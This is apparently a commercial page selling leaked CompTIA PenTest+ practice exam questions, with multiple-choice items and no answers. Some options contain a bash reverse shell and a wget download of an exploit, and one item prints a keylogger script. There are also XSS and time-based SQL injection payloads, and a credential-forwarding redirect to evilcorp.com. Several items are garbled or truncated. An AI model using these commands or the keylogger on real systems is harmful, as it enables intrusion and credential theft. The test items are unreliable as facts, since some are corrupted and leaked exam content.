Winter Special Sale Limited Time 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 713PS592

PT0-002 CompTIA PenTest+ Certification Exam Questions and Answers

Questions 4

A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?

Options:

A.

Hashcat

B.

Mimikatz

C.

Patator

D.

John the Ripper

Buy Now
Questions 5

A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:

• The following request was intercepted going to the network device:

GET /login HTTP/1.1

Host: 10.50.100.16

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept-Language: en-US,en;q=0.5

Connection: keep-alive

Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk

• Network management interfaces are available on the production network.

• An Nmap scan returned the following:

PT0-002 Question 5

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

Options:

A.

Enforce enhanced password complexity requirements.

B.

Disable or upgrade SSH daemon.

C.

Disable HTTP/301 redirect configuration.

D.

Create an out-of-band network for management.

E.

Implement a better method for authentication.

F.

Eliminate network management and control interfaces.

Buy Now
Questions 6

Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

Options:

A.

NIST SP 800-53

B.

OWASP Top 10

C.

MITRE ATT&CK framework

D.

PTES technical guidelines

Buy Now
Questions 7

A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester. Which of the following would be the most appropriate NEXT step?

Options:

A.

Terminate the contract.

B.

Update the ROE with new signatures. Most Voted

C.

Scan the 8-bit block to map additional missed hosts.

D.

Continue the assessment.

Buy Now
Questions 8

PCI DSS requires which of the following as part of the penetration-testing process?

Options:

A.

The penetration tester must have cybersecurity certifications.

B.

The network must be segmented.

C.

Only externally facing systems should be tested.

D.

The assessment must be performed during non-working hours.

Buy Now
Questions 9

A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.

Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?

Options:

A.

SQLmap

B.

Nessus

C.

Nikto

D.

DirBuster

Buy Now
Questions 10

A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

Options:

A.

VRFY and EXPN

B.

VRFY and TURN

C.

EXPN and TURN

D.

RCPT TO and VRFY

Buy Now
Questions 11

A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.

Which of the following should be included as a recommendation in the remediation report?

Options:

A.

Stronger algorithmic requirements

B.

Access controls on the server

C.

Encryption on the user passwords

D.

A patch management program

Buy Now
Questions 12

A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company’s privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?

Options:

A.

OpenVAS

B.

Nikto

C.

SQLmap

D.

Nessus

Buy Now
Questions 13

During a security assessment of a web application, a penetration tester was able to generate the following application response:

Unclosed quotation mark after the character string Incorrect syntax near ".

Which of the following is the most probable finding?

Options:

A.

SQL injection

B.

Cross-site scripting

C.

Business logic flaw

D.

Race condition

Buy Now
Questions 14

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

Options:

A.

Open-source research

B.

A ping sweep

C.

Traffic sniffing

D.

Port knocking

E.

A vulnerability scan

F.

An Nmap scan

Buy Now
Questions 15

A penetration tester ran the following command on a staging server:

python –m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

Options:

A.

nc 10.10.51.50 9891 < exploit

B.

powershell –exec bypass –f \\10.10.51.50\9891

C.

bash –i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit

D.

wget 10.10.51.50:9891/exploit

Buy Now
Questions 16

A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

PT0-002 Question 16

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

Options:

A.

Edit the discovered file with one line of code for remote callback

B.

Download .pl files and look for usernames and passwords

C.

Edit the smb.conf file and upload it to the server

D.

Download the smb.conf file and look at configurations

Buy Now
Questions 17

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

Options:

A.

Buffer overflows

B.

Cross-site scripting

C.

Race-condition attacks

D.

Zero-day attacks

E.

Injection flaws

F.

Ransomware attacks

Buy Now
Questions 18

A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

Options:

A.

iam_enum_permissions

B.

iam_privesc_scan

C.

iam_backdoor_assume_role

D.

iam_bruteforce_permissions

Buy Now
Questions 19

A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

Options:

A.

As backup in case the original documents are lost

B.

To guide them through the building entrances

C.

To validate the billing information with the client

D.

As proof in case they are discovered

Buy Now
Questions 20

A company provided the following network scope for a penetration test:

169.137.1.0/24

221.10.1.0/24

149.14.1.0/24

A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake?

Options:

A.

The company that requested the penetration test

B.

The penetration testing company

C.

The target host's owner

D.

The penetration tester

E.

The subcontractor supporting the test

Buy Now
Questions 21

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.

Which of the following tools can help the tester achieve this goal?

Options:

A.

Metasploit

B.

Hydra

C.

SET

D.

WPScan

Buy Now
Questions 22

A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?

Options:

A.

Phishing

B.

Tailgating

C.

Baiting

D.

Shoulder surfing

Buy Now
Questions 23

A penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-12-20 09:23AM 331 index.aspx

| ftp-syst:

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows Server 2012 Std

3389/tcp open ssl/ms-wbt-server

| rdp-ntlm-info:

| Target Name: WEB3

| NetBIOS_Computer_Name: WEB3

| Product_Version: 6.3.9600

|_ System_Time: 2021-01-15T11:32:06+00:00

8443/tcp open http Microsoft IIS httpd 8.5

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

Options:

A.

ftp 192.168.53.23

B.

smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 –U guest

C.

ncrack –u Administrator –P 15worst_passwords.txt –p rdp 192.168.53.23

D.

curl –X TRACE https://192.168.53.23:8443/index.aspx

E.

nmap –-script vuln –sV 192.168.53.23

Buy Now
Questions 24

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

INSTRUCTIONS

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

PT0-002 Question 24

Options:

Buy Now
Questions 25

An external consulting firm is hired to perform a penetration test and must keep the confidentiality of the security vulnerabilities and the private data found in a customer's systems. Which of the following documents addresses this requirement?

Options:

A.

ROE

B.

NDA

C.

MOU

D.

SLA

Buy Now
Questions 26

Which of the following tools would be best to use to conceal data in various kinds of image files?

Options:

A.

Kismet

B.

Snow

C.

Responder

D.

Metasploit

Buy Now
Questions 27

A penetration tester is attempting to perform reconnaissance on a customer's external-facing footprint and reviews a summary of the fingerprinting scans:

SSH servers: 23

NTP servers: 4

Rsync servers: 5

LDAP servers: 2

Which of the following OSs is the organization most likely using?

Options:

A.

Mac OS X

B.

FreeBSD

C.

Microsoft Windows

D.

Linux

Buy Now
Questions 28

A penetration tester has been given eight business hours to gain access to a client’s financial system. Which of the following techniques will have the highest likelihood of success?

Options:

A.

Attempting to tailgate an employee going into the client's workplace

B.

Dropping a malicious USB key with the company’s logo in the parking lot

C.

Using a brute-force attack against the external perimeter to gain a foothold

D.

Performing spear phishing against employees by posing as senior management

Buy Now
Questions 29

A penetration tester obtained the following results after scanning a web server using the dirb utility:

...

GENERATED WORDS: 4612

---- Scanning URL: http://10.2.10.13/ ----

+ http://10.2.10.13/about (CODE:200|SIZE:1520)

+ http://10.2.10.13/home.html (CODE:200|SIZE:214)

+ http://10.2.10.13/index.html (CODE:200|SIZE:214)

+ http://10.2.10.13/info (CODE:200|SIZE:214)

...

DOWNLOADED: 4612 – FOUND: 4

Which of the following elements is MOST likely to contain useful information for the penetration tester?

Options:

A.

index.html

B.

about

C.

info

D.

home.html

Buy Now
Questions 30

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

Options:

A.

Weekly

B.

Monthly

C.

Quarterly

D.

Annually

Buy Now
Questions 31

A penetration tester is testing a company's public API and discovers that specific input allows the execution of arbitrary commands on the base operating system. Which of the following actions should the penetration tester take next?

Options:

A.

Include the findings in the final report.

B.

Notify the client immediately.

C.

Document which commands can be executed.

D.

Use this feature to further compromise the server.

Buy Now
Questions 32

Which of the following tools provides Python classes for interacting with network protocols?

Options:

A.

Responder

B.

Impacket

C.

Empire

D.

PowerSploit

Buy Now
Questions 33

A company has hired a penetration tester to deploy and set up a rogue access point on the network.

Which of the following is the BEST tool to use to accomplish this goal?

Options:

A.

Wireshark

B.

Aircrack-ng

C.

Kismet

D.

Wifite

Buy Now
Questions 34

Which of the following tools would be the best to use to intercept an HTTP response at an API, change its content, and forward it back to the origin mobile device?

Options:

A.

Drozer

B.

Burp Suite

C.

Android SDK Tools

D.

MobSF

Buy Now
Questions 35

Which of the following is the most important to include in the scope of a wireless security assessment?

Options:

A.

Frequencies

B.

APs

C.

SSIDs

D.

Signal strengths

Buy Now
Questions 36

A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?

Options:

A.

nmap -sU -p 1-1024 10.0.0.15

B.

nmap -p 22,25, 80, 3389 -T2 10.0.0.15 -Pn

C.

nmap -T5 -p 1-65535 -A 10.0.0.15

D.

nmap -T3 -F 10.0.0.15

Buy Now
Questions 37

A penetration tester noticed that an employee was using a wireless headset with a smartphone. Which of the following methods would be best to use to intercept the communications?

Options:

A.

Multiplexing

B.

Bluejacking

C.

Zero-day attack

D.

Smurf attack

Buy Now
Questions 38

A company developed a new web application to allow its customers to submit loan applications. A penetration tester is reviewing the application and discovers that the application was developed in ASP and used MSSQL for its back-end database. Using the application's search form, the penetration tester inputs the following code in the search input field:

IMG SRC=vbscript:msgbox ("Vulnerable_to_Attack") ; >originalAttribute="SRC"originalPath="vbscript;msgbox ("Vulnerable_to_Attack ") ;>"

When the tester checks the submit button on the search form, the web browser returns a pop-up windows that displays "Vulnerable_to_Attack." Which of the following vulnerabilities did the tester discover in the web application?

Options:

A.

SQL injection

B.

Command injection

C.

Cross-site request forgery

D.

Cross-site scripting

Buy Now
Questions 39

During a test of a custom-built web application, a penetration tester identifies several vulnerabilities. Which of the following would be the most interested in the steps to reproduce these vulnerabilities?

Options:

A.

Operations staff

B.

Developers

C.

Third-party stakeholders

D.

C-suite executives

Buy Now
Questions 40

A security analyst is conducting an unknown environment test from 192.168.3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve this objective?

Options:

A.

nmap -F 192.168.5.5

B.

nmap -datalength 2 192.168.5.5

C.

nmap -D 10.5.2.2 192.168.5.5

D.

nmap -scanflags SYNFIN 192.168.5.5

Buy Now
Questions 41

A penetration tester is preparing a credential stuffing attack against a company's website. Which of the following can be used to passively get the most relevant information?

Options:

A.

Shodan

B.

BeEF

C.

HavelBeenPwned

D.

Maltego

Buy Now
Questions 42

A security consultant wants to perform a vulnerability assessment with an application that can effortlessly generate an easy-to-read report. Which of the following should the attacker use?

Options:

A.

Brakeman

B.

Nessus

C.

Metasploit

D.

SCAP

Buy Now
Questions 43

A penetration testing firm performs an assessment every six months for the same customer. While performing network scanning for the latest assessment, the penetration tester observes that several of the target hosts appear to be residential connections associated with a major television and ISP in the area. Which of the following is the most likely reason for the observation?

Options:

A.

The penetration tester misconfigured the network scanner.

B.

The network scanning tooling is not functioning properly.

C.

The IP ranges changed ownership.

D.

The network scanning activity is being blocked by a firewall.

Buy Now
Questions 44

A penetration tester exploits a vulnerable service to gain a shell on a target server. The tester receives the following:

Directory of C:\Users\Guest 05/13/2022 09:23 PM mimikatz.exe 05/18/2022 09:24 PM mimidrv.sys 05/18/2022 09:24 PM mimilib.dll

Which of the following best describes these findings?

Options:

A.

Indicators of prior compromise

B.

Password encryption tools

C.

False positives

D.

De-escalation attempts

Buy Now
Questions 45

A penetration tester fuzzes an internal server looking for hidden services and applications and obtains the following output:

PT0-002 Question 45

Which of the following is the most likely explanation for the output?

Options:

A.

The tester does not have credentials to access the server-status page.

B.

The admin directory cannot be fuzzed because it is forbidden.

C.

The admin, test, and db directories redirect to the log-in page.

D.

The robots.txt file has six entries in it.

Buy Now
Questions 46

A penetration tester is performing an assessment against a customer’s web application that is hosted in a major cloud provider’s environment. The penetration tester observes that the majority of the attacks attempted are being blocked by the organization's WAF. Which of the following attacks would be most likely to succeed?

Options:

A.

Reflected XSS

B.

Brute-force

C.

DDoS

D.

Direct-to-origin

Buy Now
Questions 47

Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

Options:

A.

The CVSS score of the finding

B.

The network location of the vulnerable device

C.

The vulnerability identifier

D.

The client acceptance form

E.

The name of the person who found the flaw

F.

The tool used to find the issue

Buy Now
Questions 48

During an assessment, a penetration tester obtains a list of password digests using Responder. Which of the following tools would the penetration tester most likely use next?

Options:

A.

Hashcat

B.

Hydra

C.

CeWL

D.

Medusa

Buy Now
Questions 49

A security analyst is conducting an unknown environment test from 192.168 3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve This objective?

Options:

A.

Nmap –F 192.168.5.5

B.

Map –datalength 2.192.168.5.5

C.

Nmap –D 10.5.2.2.168.5.5

D.

Map –scanflags SYNFIN 192.168.5.5

Buy Now
Questions 50

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.

Which of the following is the BEST way to ensure this is a true positive?

Options:

A.

Run another scanner to compare.

B.

Perform a manual test on the server.

C.

Check the results on the scanner.

D.

Look for the vulnerability online.

Buy Now
Questions 51

A penetration tester observes an application enforcing strict access controls. Which of the following would allow the tester to bypass these controls and successfully access the organization's sensitive files?

Options:

A.

Remote file inclusion

B.

Cross-site scripting

C.

SQL injection

D.

Insecure direct object references

Buy Now
Questions 52

A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:

[ATTEMPT] target 192.168.1.112 - login "root" - pass "abcde"

[ATTEMPT] target 192.168.1.112 - login "root" - pass "edcfg"

[ATTEMPT] target 192.168.1.112 - login "root" - pass "qazsw"

[ATTEMPT] target 192.168.1.112 - login "root" – pass “tyuio”

Which of the following is the penetration tester conducting?

Options:

A.

Port scan

B.

Brute force

C.

Credential stuffing

D.

DoS attack

Buy Now
Questions 53

During an assessment, a penetration tester emailed the following Python script to CompTIA's employees:

import pyHook, sys, logging, pythoncom, datetime

log_file='C:\\Windows\\Temp\\log_comptia.txt' def KbrdEvent(event):

logging.basicConfig(filename=log_file,level=logging.DEBUG, format='%(messages)s') chr(event.Ascii)

logging.log(10, chr(event.Ascii))

return True

hooks_manager = pyHook.HookManager()

hooks_manager.KeyDown = KbrdEvent

hooks_manager.HookKeyboard()

pythoncom.PumpMessages()

Which of the following is the intended effect of this script?

Options:

A.

Debugging an exploit

B.

Keylogging

C.

Collecting logs

D.

Scheduling tasks

Buy Now
Questions 54

A penetration tester captures SMB network traffic and discovers that users are mistyping the name of a fileshare server. This causes the workstations to send out requests attempting to resolve the fileshare server's name. Which of the following is the best way for a penetration tester to exploit this situation?

Options:

A.

Relay the traffic to the real file server and steal documents as they pass through.

B.

Host a malicious file to compromise the workstation.

C.

Reply to the broadcasts with a fake IP address to deny access to the real file server.

D.

Respond to the requests with the tester's IP address and steal authentication credentials.

Buy Now
Questions 55

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

PT0-002 Question 55

PT0-002 Question 55

PT0-002 Question 55

PT0-002 Question 55

PT0-002 Question 55

PT0-002 Question 55

Options:

Buy Now
Questions 56

Which of the following elements of a penetration testing report aims to provide a normalized and standardized representation of discovered vulnerabilities and the overall threat they present to an affected system or network?

Options:

A.

Executive summary

B.

Vulnerability severity rating

C.

Recommendations of mitigation

D.

Methodology

Buy Now
Questions 57

A penetration tester issues the following command after obtaining a low-privilege reverse shell: wmic service get name,pathname,startmode

Which of the following is the most likely reason the penetration tester ran this command?

Options:

A.

To search for passwords in the service directory

B.

To list scheduled tasks that may be exploitable

C.

To register a service to run as System

D.

To find services that have unquoted service paths

Buy Now
Questions 58

A penetration tester is conducting a test after hours and notices a critical system was taken down. Which of the following contacts should be notified first?

Options:

A.

Secondary

B.

Emergency

C.

Technical

D.

Primary

Buy Now
Questions 59

A penetration tester is conducting an assessment for an e-commerce company and successfully copies the user database to the local machine. After a closer review, the penetration tester identifies several high-profile celebrities who have active user accounts with the online service. Which of the following is the most appropriate next step?

Options:

A.

Contact the high-profile celebrities.

B.

Delete the high-profile accounts.

C.

Immediately contact the client.

D.

Record the findings in the penetration test report.

Buy Now
Questions 60

A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?

Options:

A.

Set up a captive portal with embedded malicious code.

B.

Capture handshakes from wireless clients to crack.

C.

Span deauthentication packets to the wireless clients.

D.

Set up another access point and perform an evil twin attack.

Buy Now
Questions 61

Which of the following is the most important aspect to consider when calculating the price of a penetration test service for a client?

Options:

A.

Operating cost

B.

Required scope of work

C.

Non-disclosure agreement

D.

Client's budget

Buy Now
Questions 62

Which of the following best explains why communication is a vital phase of a penetration test?

Options:

A.

To discuss situational awareness

B.

To build rapport with the emergency contact

C.

To explain the data destruction process

D.

To ensure the likelihood of future assessments

Buy Now
Questions 63

A penetration tester wants to perform a SQL injection test. Which of the following characters should the tester use to start the SQL injection attempt?

Options:

A.

Colon

B.

Double quote mark

C.

Single quote mark

D.

Semicolon

Buy Now
Questions 64

A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the following tools will the tester most likely utilize?

Options:

A.

Wireshark

B.

Netcat

C.

Nmap

D.

Ettercap

Buy Now
Questions 65

During a vulnerability scanning phase, a penetration tester wants to execute an Nmap scan using custom NSE scripts stored in the following folder:

/home/user/scripts

PT0-002 Question 65

Which of the following commands should the penetration tester use to perform this scan?

Options:

A.

nmap resume "not intrusive"

B.

nmap script default safe

C.

nmap script /home/user/scripts

D.

nmap -load /home/user/scripts

Buy Now
Questions 66

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.

INSTRUCTIONS

Select the tool the penetration tester should use for further investigation.

Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

PT0-002 Question 66

Options:

Buy Now
Questions 67

A penetration tester managed to exploit a vulnerability using the following payload:

IF (1=1) WAIT FOR DELAY '0:0:15'

Which of the following actions would best mitigate this type ol attack?

Options:

A.

Encrypting passwords

B.

Parameterizing queries

C.

Encoding output

D.

Sanitizing HTML

Buy Now
Questions 68

Which of the following tools can a penetration tester use to brute force a user password over SSH using multiple threads?

Options:

A.

CeWL

B.

John the Ripper

C.

Hashcat

D.

Hydra

Buy Now
Questions 69

Given the following Nmap scan command:

[root@kali ~]# nmap 192.168.0 .* -- exclude 192.168.0.101

PT0-002 Question 69

Which of the following is the total number of servers that Nmap will attempt to scan?

Options:

A.

1

B.

101

C.

255

D.

256

Buy Now
Questions 70

Which of the following assessment methods is the most likely to cause harm to an ICS environment?

Options:

A.

Active scanning

B.

Ping sweep

C.

Protocol reversing

D.

Packet analysis

Buy Now
Questions 71

A penetration tester developed the following script to be used during an engagement:

#!/usr/bin/python

import socket, sys

ports = [21, 22, 23, 25, 80, 139, 443, 445, 3306, 3389]

if len(sys.argv) > 1:

target = socket.gethostbyname (sys. argv [0])

else:

print ("Few arguments.")

print ("Syntax: python {} ". format (sys. argv [0]))

sys.exit ()

try:

for port in ports:

s = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

s.settimeout (2)

result = s.connect_ex ((target, port) )

if result == 0:

print ("Port {} is opened". format (port) )

except KeyboardInterrupt:

print ("\nExiting ... ")

sys.exit ()

However, when the penetration tester ran the script, the tester received the following message:

socket.gaierror: [Errno -2] Name or service not known

Which of the following changes should the penetration tester implement to fix the script?

Options:

A.

From:

target = socket.gethostbyname (sys. argv [0])

To:

target = socket.gethostbyname (sys.argv[1])

B.

From:

s = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

To:

s = socket.socket (socket.AF_INET, socket. SOCK_DGRAM)

C.

From:

import socket, sys

To:

import socket

import sys

D.

From:

result = s.connect_ex ((target, port) )

To:

result = s.connect ( (target, port) )

Buy Now
Questions 72

During an engagement, a junior penetration tester found a multihomed host that led to an unknown network segment. The penetration tester ran a port scan against the network segment, which caused an outage at the customer's factory. Which of the following documents should the junior penetration tester most likely follow to avoid this issue in the future?

Options:

A.

NDA

B.

MSA

C.

ROE

D.

SLA

Buy Now
Questions 73

During a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web the following actions should the penetration tester perform next?

Options:

A.

Continue the assessment and mark the finding as critical.

B.

Attempting to remediate the issue temporally.

C.

Notify the primary contact immediately.

D.

Shutting down the web server until the assessment is finished

Buy Now
Questions 74

Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

Options:

A.

An unknown-environment assessment

B.

A known-environment assessment

C.

A red-team assessment

D.

A compliance-based assessment

Buy Now
Questions 75

ion tester is attempting to get more people from a target company to download and run an executable. Which of the following would be the.. :tive way for the tester to achieve this objective?

Options:

A.

Dropping USB flash drives around the company campus with the file on it

B.

Attaching the file in a phishing SMS that warns users to execute the file or they will be locked out of their accounts

C.

Sending a pretext email from the IT department before sending the download instructions later

D.

Saving the file in a common folder with a name that encourages people to click it

Buy Now
Questions 76

Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?

Options:

A.

Wireshark

B.

EAPHammer

C.

Kismet

D.

Aircrack-ng

Buy Now
Questions 77

A penetration tester ran an Nmap scan on an Internet-facing network device with the –F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:

nmap –O –A –sS –p- 100.100.100.50

Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

Options:

A.

A firewall or IPS blocked the scan.

B.

The penetration tester used unsupported flags.

C.

The edge network device was disconnected.

D.

The scan returned ICMP echo replies.

Buy Now
Questions 78

A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.

Which of the following actions, if performed, would be ethical within the scope of the assessment?

Options:

A.

Exploiting a configuration weakness in the SQL database

B.

Intercepting outbound TLS traffic

C.

Gaining access to hosts by injecting malware into the enterprise-wide update server

D.

Leveraging a vulnerability on the internal CA to issue fraudulent client certificates

E.

Establishing and maintaining persistence on the domain controller

Buy Now
Questions 79

A penetration testing firm wants to hire three additional consultants to support a newly signed long-term contract with a major customer. The following is a summary of candidate

background checks:

PT0-002 Question 79

Which of the following candidates should most likely be excluded from consideration?

Options:

A.

Candidate 1

B.

Candidate 2

C.

Candidate 3

D.

Candidate 4

Buy Now
Questions 80

For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:

PT0-002 Question 80

Which of the following lines of code should the security engineer add to make the attack successful?

Options:

A.

window.location.= 'https://evilcorp.com '

B.

crossDomain: true

C.

geturlparameter ('username')

D.

redirectUrl = 'https://example.com '

Buy Now
Questions 81

A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?

Options:

A.

Weak authentication schemes

B.

Credentials stored in strings

C.

Buffer overflows

D.

Non-optimized resource management

Buy Now
Questions 82

A penetration tester runs the following command:

l.comptia.local axfr comptia.local

which of the following types of information would be provided?

Options:

A.

The DNSSEC certificate and CA

B.

The DHCP scopes and ranges used on the network

C.

The hostnames and IP addresses of internal systems

D.

The OS and version of the DNS server

Buy Now
Questions 83

During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

Options:

A.

SOW.

B.

SLA.

C.

ROE.

D.

NDA

Buy Now
Questions 84

A security analyst needs to perform an on-path attack on BLE smart devices. Which of the following tools would be BEST suited to accomplish this task?

Options:

A.

Wireshark

B.

Gattacker

C.

tcpdump

D.

Netcat

Buy Now
Questions 85

A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

PT0-002 Question 85

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile , a blank page was displayed.

Which of the following is the MOST likely reason for the lack of output?

Options:

A.

The HTTP port is not open on the firewall.

B.

The tester did not run sudo before the command.

C.

The web server is using HTTPS instead of HTTP.

D.

This URI returned a server error.

Buy Now
Questions 86

Which of the following factors would a penetration tester most likely consider when testing at a location?

Options:

A.

Determine if visas are required.

B.

Ensure all testers can access all sites.

C.

Verify the tools being used are legal for use at all sites.

D.

Establish the time of the day when a test can occur.

Buy Now
Questions 87

During an assessment, a penetration tester inspected a log and found a series of thousands of requests coming from a single IP address to the same URL. A few of the requests are listed below.

PT0-002 Question 87

Which of the following vulnerabilities was the attacker trying to exploit?

Options:

A.

..Session hijacking

B.

..URL manipulation

C.

..SQL injection

D.

..Insecure direct object reference

Buy Now
Questions 88

A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?

Options:

A.

Maximizing the likelihood of finding vulnerabilities

B.

Reprioritizing the goals/objectives

C.

Eliminating the potential for false positives

D.

Reducing the risk to the client environment

Buy Now
Questions 89

A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:

PT0-002 Question 89

Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?

Options:

A.

Run an application vulnerability scan and then identify the TCP ports used by the application.

B.

Run the application attached to a debugger and then review the application's log.

C.

Disassemble the binary code and then identify the break points.

D.

Start a packet capture with Wireshark and then run the application.

Buy Now
Questions 90

A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?

Options:

A.

Gain access to the target host and implant malware specially crafted for this purpose.

B.

Exploit the local DNS server and add/update the zone records with a spoofed A record.

C.

Use the Scapy utility to overwrite name resolution fields in the DNS query response.

D.

Proxy HTTP connections from the target host to that of the spoofed host.

Buy Now
Questions 91

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision?

Options:

A.

The tester had the situational awareness to stop the transfer.

B.

The tester found evidence of prior compromise within the data set.

C.

The tester completed the assigned part of the assessment workflow.

D.

The tester reached the end of the assessment time frame.

Buy Now
Questions 92

Penetration tester who was exclusively authorized to conduct a physical assessment noticed there were no cameras pointed at the dumpster for company. The penetration tester returned at night and collected garbage that contained receipts for recently purchased networking :. The models of equipment purchased are vulnerable to attack. Which of the following is the most likely next step for the penetration?

Options:

A.

Alert the target company of the discovered information.

B.

Verify the discovered information is correct with the manufacturer.

C.

Scan the equipment and verify the findings.

D.

Return to the dumpster for more information.

Buy Now
Questions 93

Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?

Options:

A.

Nessus

B.

Metasploit

C.

Burp Suite

D.

Ethercap

Buy Now
Questions 94

Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?

Options:

A.

SOW

B.

SLA

C.

MSA

D.

NDA

Buy Now
Questions 95

A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following:

IP Address: 192.168.1.63

Physical Address: 60-36-dd-a6-c5-33

Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?

Options:

A.

tcpdump -i eth01 arp and arp[6:2] == 2

B.

arp -s 192.168.1.63 60-36-DD-A6-C5-33

C.

ipconfig /all findstr /v 00-00-00 | findstr Physical

D.

route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1

Buy Now
Questions 96

After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:

PT0-002 Question 96

Which of the following attacks is the penetration tester most likely trying to perform?

Options:

A.

Metadata service attack

B.

Container escape techniques

C.

Credential harvesting

D.

Resource exhaustion

Buy Now
Questions 97

